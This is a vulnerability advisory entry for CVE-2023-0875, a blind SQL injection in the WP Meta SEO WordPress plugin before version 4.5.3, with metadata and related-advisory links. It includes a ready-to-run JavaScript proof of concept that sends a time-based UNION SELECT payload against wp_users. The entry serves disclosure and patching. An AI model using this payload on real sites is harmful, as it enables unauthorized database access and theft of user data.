Lucene search
Dc11WPEX-ID:D44E9A45-CBDF-46B1-8B48-7D934B617534HistoryFeb 27, 2023 - 12:00 a.m.
WP Meta SEO < 4.5.3 - Subscriber+ SQLi
2023-02-2700:00:00
dc11
73
wp meta seo
subscriber+
sql injection
EPSS
0.001
Percentile
31.1%
The plugin does not properly sanitize and escape inputs into SQL queries, leading to a blind SQL Injection vulnerability that can be exploited by subscriber+ users.
Run the following js code in your web console on the dashboard as a subscriber:
fetch( 'admin-ajax.php', { method: 'POST', headers: {'Content-Type': 'application/x-www-form-urlencoded'}, body:'action=wpms&wpms_nonce=' + wpms_localize.wpms_nonce + "&task=bulk_image_copy&action_name=img-copy-desc&ids[]=-1) UNION (SELECT null, null, IF(1=1, SLEEP(2), SLEEP(4)) , null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null FROM wp_users)#" } );
This statement delays the request by n*2 seconds, where n is the number of user entries in your wp_users table.Related
prion
prion
Sql injection
2023-03-20 16:15:00
cvelist
cvelist
CVE-2023-0875 WP Meta SEO < 4.5.3 - Subscriber+ SQLi
2023-03-20 15:52:21
cve
cve
CVE-2023-0875
2023-03-20 16:15:12
wpvulndb
wpvulndb
WP Meta SEO < 4.5.3 - Subscriber+ SQLi
2023-02-27 00:00:00
nvd
nvd
CVE-2023-0875
2023-03-20 16:15:12